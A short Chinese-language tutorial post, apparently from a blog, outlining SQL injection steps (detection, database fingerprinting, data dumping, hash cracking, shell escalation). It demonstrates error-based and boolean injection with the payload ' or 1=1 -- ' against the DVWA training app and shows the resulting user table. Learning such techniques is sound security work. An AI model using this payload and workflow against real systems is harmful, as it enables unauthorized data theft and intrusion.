SQL注入流程
1. 判断是否有SQL注入漏洞;
2. 判断操作系统、数据库和web应用的类型;
3. 获取数据库信息,包括管理员信息及拖库;
4. 加密信息破解,sqlmap可自动破解;
5. 提升权限,获得sql-shell、os-shell、登录应用后台;
几种注入:
1.基于错误的注入
错误注入的思路是通过构造特殊的sql语句,根据得到的错误信息,确认sql注入点;
通过数据库报错信息,也可以探测到数据库的类型和其他有用信息。
通过输入单引号,触发数据库异常,通过异常日志诊断数据库类型,例如这里是MySQL数据库。
2.基于布尔的注入
布尔逻辑注入的思路是闭合SQL语句、构造or和and逻辑语句、注释多余的代码;
'or 1=1 -- '
相当于 select first_name,last_name from dvwa.users where user_id=' ' or 1=1 -- ' '
mysql> select first_name,last_name from dvwa.users where user_id=' ' or 1=1 -- ' '
-> ;
+------------+-----------+
| first_name | last_name |
+------------+-----------+
| admin | admin |
| Gordon | Brown |
| Hack | Me |
| Pablo | Picasso |
| Bob | Smith |
| user | user |
+------------+-----------+
6 rows in set (0.00 sec)
mysql>
说明:
第一个' 用于闭合前面的条件
or 1=1 为真的条件
-- 将注释后面的所有语句
标签:name,--,数据库,user,SQL,注入 From: https://www.cnblogs.com/yitian395/p/16839988.html